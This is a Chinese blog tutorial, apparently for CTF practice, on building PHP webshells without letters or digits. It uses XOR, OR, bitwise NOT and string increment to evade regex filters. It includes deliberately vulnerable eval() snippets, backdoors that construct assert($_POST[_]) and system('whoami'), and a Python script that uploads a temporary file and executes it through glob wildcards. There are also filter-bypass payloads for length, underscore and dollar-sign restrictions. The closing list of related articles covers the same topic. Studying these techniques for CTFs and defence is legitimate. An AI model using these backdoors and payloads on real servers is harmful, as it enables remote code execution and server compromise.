php无字母数字构造入门

最新推荐文章于 2024-08-11 14:21:42 发布
最新推荐文章于 2024-08-11 14:21:42 发布
阅读量651 收藏 3
点赞数 3
分类专栏: web 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51518970/article/details/121616587
版权

1 前置知识

1.1 php中的正则匹配函数

最常见的preg_grep()

preg_grep(string $pattern, array $array, int $flags = 0): array|false

返回给定数组array中与模式pattern 匹配的元素组成的数组

其余的正则函数可以在https://www.runoob.com/php/php-pcre.html里学习

1.2 正则匹配式

正则表达式手册:https://tool.oschina.net/uploads/apidocs/jquery/regexp.html

https://www.runoob.com/regexp/regexp-tutorial.html

动态调试正则表达式的网站:https://regex101.com/

中文在线调试:https://c.runoob.com/front-end/854/

尝试阅读几个正则表达式:

/^[a-z0-9_-]{3,16}$/		用来过滤用户名

/^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/		匹配ip地址

/^[a-z\d]+(\.[a-z\d]+)*@([\da-z](-[\da-z])?)+(\.{1,2}[a-z]+)+$/电子邮箱

1.3 php中的位运算

在构造字符绕正则的时候,我们常用位运算符来帮助我们构造

php位运算符:https://blog.csdn.net/qq_28602957/article/details/52141431

2 无字母数字构造

2.1 无字母数字基础

<?php
if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) {
  eval($_GET['shell']);
}

php5

修饰符i,s:https://www.runoob.com/regexp/regexp-flags.html

异或拼接:

(来自p牛博客

<?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
$___=$$__;
$_($___[_]); // assert($_POST[_]);

(很多不可打印字符,用url编码表示)

异或:

("%0b%08%0b%09%0e%06%0f"^"%7b%60%7b%60%60%60%60")();

这样可以phpinfo

倘若过滤了引号:

${%86%86%86%86^%d9%c1%c3%d2}{%86}();&%86=phpinfo

%86%86%86%86^%d9%c1%c3%d2构造出_GET,php中可以这样构造参数,花括号在数组中可以索引:

$_GET{2}

一个非数字字母的php后门(使用异或):

// demo1.php
<?php
    @$_++; // $_ = 1
    $__=("#"^"|"); // $__ = _
    $__.=("."^"~"); // _P
    $__.=("/"^"`"); // _PO
    $__.=("|"^"/"); // _POS
    $__.=("{"^"/"); // _POST 
    ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>

拼接_POST:

$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");

更短的字符:

"`{{{"^"?<>/" //_GET
"#./|{"^"|~`//" //_POST

或:

("%10%08%10%09%0e%06%0f"|"%60%60%60%60%60%60%60")();

这样可以phpinfo

("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%17%08%0f%01%0d%09"|"%60%60%60%60%60%60");

system(‘whoami’); 可以rce

取反:

(~%8F%97%8F%96%91%99%90)();

可phpinfo

utf-8下取中文字符取反:

UTF-8编码的某个汉字,并将其中某个字符取出来,比如’和’{2}的结果是"\x8c",其取反即为字母s

<?php
$_="和";
print(~($_{2}));
print(~"\x8c");
?>

脚本生成:

>>> def get(shell):
...     hexbit=''.join(map(lambda x: hex(~(-(256-ord(x)))),shell))
...     print(hexbit)
...
>>> get('phpinfo')
0x8f0x970x8f0x960x910x990x90

自增:

‘a’++ => ‘b’,‘b’++ => ‘c’… 所以,我们只要能拿到一个变量,其值为a,通过自增操作即可获得a-z中所有字符。

文档:http://php.net/manual/zh/language.operators.increment.php

如何拿到一个值为字符串’a’的变量呢?

数组(Array)的第一个字母就是大写A,而且第4个字母是小写a。也就是说,我们可以同时拿到小写和大写A,等于我们就可以拿到a-z和A-Z的所有字母。

在PHP中,如果强制连接数组和字符串的话,数组将被转换成字符串,其值为Array:

<?php
echo ''.[];//Array

构造:ASSERT($_POST[_]);

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);

//测试发现7.0.12以上版本不可使用
//使用时需要url编码下
$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);
固定格式 构造出来的 assert($_POST[_]);
然后post传入   _=phpinfo();

不用数字构造数字:

echo ('>'>'<')+('>'>'<');//2
echo true+true;//2

或者:

<?php
$_++;
print($_); // 1
?>
php中未定义的变量默认值为null,nullfalse0

2.2 长度限制

<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

php7:

PHP7前是不允许用($a)();这样的方法来执行动态函数的,但PHP7中增加了对此的支持。所以,我们可以通过(‘phpinfo’)();来执行函数,第一个括号中可以是任意PHP表达式。

(~%8F%97%8F%96%91%99%90)();

php5:

上传临时文件:

import requests
url="http://xxx/test.php?code=?><?=`. /???/????????[@-[]`;?>"
files={'file':'cat f*'}
response=requests.post(url,files=files)
html = response.text
print(html)

具体原理看p神文章可了解详细

glob通配符:https://man7.org/linux/man-pages/man7/glob.7.html

2.3 过滤下划线

<?php

include 'flag.php';

if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>50){
        die("Too Long.");
    }
    if(preg_match("/[A-Za-z0-9_]+/",$code)){
        die("Not Allowed.");
    }
    @eval($code);
}else{
    highlight_file(__FILE__);
}
//$hint =  "php function getFlag() to get flag";
?>

异或:

?code=('$').("`{{{"^"?<>/").(['+'])&+=getFlag();

这样是错误的,因为eval只能解析一遍代码,而此时中间的拼接就会成为第一遍解析的运算

正确的payload为:

?code=${"`{{{"^"?<>/"}['+']();&+=getFlag

这里利用了**${}**中的代码是可以执行的特点,其实也就是可变变量。

示例:

<?php
    $a = 'hello';
    $$a = 'world';
    echo "$a ${$a}";
?>
    
    >>hello world

取反:

?code=%24%7B%7E%22%A0%B8%BA%AB%22%7D%5B%AA%5D%28%29%3B&%aa=getFlag

其中24%7B%7E%22%A0%B8%BA%AB%22%7D%5B%AA%5D%28%29%3B = ${~"\xa0\xb8\xba\xab"} = $_GET

~在{}中执行了取反操作

2.4 过滤$字符

<?php 
include 'flag.php';
if(isset($_GET['code']))
{
    $code=$_GET['code'];
    if(strlen($code)>35){
    die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code))
    {
        die("NO.");
    }
    @eval($code);
}
else
{
    highlight_file(__FILE__);
}
//$hint="php function getFlag() to get flag";
?>

payload:

code=?><?=`/???/??? ????.???`?>

/???/???通配``/bin/cat,???.???通配flag.php`

参考:

https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html

https://ca01h.top/Web_security/php_related/8.PHP%E6%97%A0%E6%95%B0%E5%AD%97%E5%AD%97%E6%AF%8D%E6%9E%84%E9%80%A0webshell/

https://blog.csdn.net/miuzzx/article/details/109143413
https://blog.csdn.net/qq_45521281/article/details/105656936

aeqaq
关注
专栏目录
详解PHP代码执行漏洞--无字母shell
贤鱼的博客
09-08 480
介绍代码执行漏洞中无字母shell脚本及其实操过程
ctfshow web41 无字母数字命令执行
Sapphire037的博客
10-30 2366
1 首先,捋一捋思路,我们可以先看过滤的字符 比如/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i或者/[a-z0-9]/is 这里可以先看P神的一些不包含数字字母的webshell ,大概意思就是通过一些字符互相运算后构造得到我们的payload,了解基本原理之后,我们再看ctfshow中的这样一道例题 <?php /* # -*- coding: utf-8 -*- # @Author: 羽 # @Date: 2020-09-05 20:31
php字母数字代码执行
m0_52432374的博客
04-30 374
字母数字webshell之命令执行
最新发布
weixin_71398630的博客
08-11 488
那么答案就呼之欲出了,我们只要找到一个可以表示“大写字母”的glob通配符,就能精准找到我们要执行的文件。所有方法,都用到了PHP中的变量,需要对变量进行变形、异或、取反等操作,最后动态执行函数。或者叫period,它的作用和source一样,就是用当前的shell执行一个文件中的命令。这个文件也很好得到,我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是。因为反引号不属于“字母”、“数字”,所以我们可以执行系统命令,但问题来了:如何利用无字母数字
php代码审计--无数字字母构造webshell
D-R0s1的博客
02-12 1455
前言 这篇文章在写的时候我查阅了许多资料也参考了很多师傅的博客,尽我所能的搞懂这个知识点以及要完成这个操作所需要的相关知识。在搞明白以后,回过头来看,其实也没有当初那样晦涩难懂,只是初学起来会因为知识储备不够而走入思维的误区。 网上也有很多的相关资料,但我还是想把这篇文章分享出来,并不是因为我总结的有多好,见解有多深刻,而是每个人在遇到这个问题的时候思维不一样,知识储备不一样,走入的误区也不一样。...
PHP字母数字构造Webshell
西部壮仔的博客
02-03 1708
题目 index.php: <?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>40){ //检测字符长度 die("Long."); } if(preg_match("/[A-Za-z0-9]+/",$co...
命令执行-无字母数字webshell
leekos的博客,分享web安全相关知识~
12-26 2129
命令执行无字母数字webshell
PHP入门教程之面向对象基本概念实例分析
10-21
类名通常使用大写字母开头,这是PHP面向对象编程的一个惯例,这样做可以方便地与其他代码区分开来。比如,在示例代码中定义了一个名为Computer的类,代码如下: ```php class Computer { // 类体 } ``` 接下来,...
PHP学习记录:PHP快速入门,一篇即可!
热门推荐
jimson_zhu的博客
08-12 1万+
这里整理了本人PHP自学过程中的关键知识点,相信看完这一篇博客足矣入门PHP。 一)php认识 1)一门运行于服务端的脚本语言; 2)一般常用于做后台管理系统,或与html混合使用、结合第三方后台框架开发web应用等;文件名以.php结尾; 3)php原始名Personal Home Pagepersonal,后来更改为Hypertext Preprocessor,由拉斯马斯·...
[ctf零基础入门]php基础
小飒的博客
08-28 1197
本文难度简单,适合0基础 工具:hackbar或burp ,PHPstudy Php基本语法: https://www.w3school.com.cn/php/php_syntax.asp 先快速自学 弱类型 如果一个字符串为 “合法数字+e+合法数字”类型,将会解释为科学计数法的浮点数 如果一个字符串为 “合法数字+ 不可解释为合法数字的字符串”类型,将会被转换为该合法数字的值,后面的字符串将会被丢弃 如果一个字符串为“不可解释为合法数字的字符串+任意”类型,则被转换为0! 1 <?php 2 va
PHP入门
kunkun5love的博客
04-29 1033
PHP php是运行在服务端的脚本语言. 特点: 1、运行在服务器端:学会了PHP,就可以指挥服务器给你干活,甚至是搞破坏_(千万不能真这么做咯),WEB网站的大部分数据都是存储在服务器端的,PHP就是用来处理这些存储在服务器的数据的(功能强大吧)。 2、跨平台:服务器可以是多种平台的服务器,比如Linux、Windows、Unix,你都可以指挥(不用怕只能指挥一种服务器啦吧)。 3、脚本语言:它...
Suctf知识记录&&PHP代码审计,无字母数字webshell
weixin_30892889的博客
09-14 949
Checkin .user.ini构成php后门利用,设置auto_prepend_file=01.jpg,自动在文件前包含了01.jpg,利用.user.ini和图片马实现文件包含+图片马的利用. 而.htacess构造后门是通过上传.htaccess设置AddType application/x-httpd-php .jpg,将jpg文件作为php解析,getshell Ea...
字母数字RCE
yourdawntown的博客
09-06 2034
版本为php5 php5中assert是一个函数,我们可以通过f=′assert′;f='assert';f=′assert′;f(…);这样的方法来动态执行任意代码。 但php7中,assert不再是函数,变成了一个语言结构(类似eval),不能再作为函数名动态执行代码,所以利用起来稍微复杂一点。但也无需过于担心,比如我们利用file_put_contents函数,同样可以用来getshell。 无数字字母rce 测试代码 <?php if(!preg_match('/[a-z0-9]/is',
字母RCE
qq_64201116的博客
06-23 1785
字母RCE你到底有多懂,看了也许会更进一步
关于php字母代码的研究
weixin_33763244的博客
08-08 254
2019独角兽企业重金招聘Python工程师标准>>> ...
php执行先后顺序_CTFweb类型(二十一)无数字字母的命令执行及相关例题
weixin_39741459的博客
01-02 220
点击上方蓝色字体,关注我们无数字字母get shell时候,假如你可以去传入一些参数,并且能够执行,但是你不能传数字字母,要想得到get shell一定会用到一些函数,在之前的内容中都很多提到,不管是命令执行还是代码执行,它有非常多的一些函数在里头。如果现在不能传入字母,也就意味着无法传入这些函数,无法执行函数的时候就没有办法去get shell。所以说无字母数字get shell的,...
php5构造字母数字的webshell实现任意命令执行
qq_68163788的博客
12-02 1403
Webshell是一种恶意软件,通常指的是通过网络渠道上传到受攻击的服务器上的一段可执行代码。它可以被用来获取对服务器的远程控制权限,执行各种操作包括文件管理、数据库访问、系统命令执行等。
字母数字的webshell
weixin_43940853的博客
02-29 1777
构造数字字母的webshell 1.异或 可以看到将A和?进行异或可以得到~ 异或的过程就是将字符转化为ascii,再变为二进制进行异或 这里就是将"A"的Ascii码的二进制与"?"的Ascii码的二进制进行异或得到一个新的二进制,在变为Ascii码,最后在变为字符,也就是~ 首先我们实现构造assert($_POST[_]); <?php for ($i=0; $i < 256...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值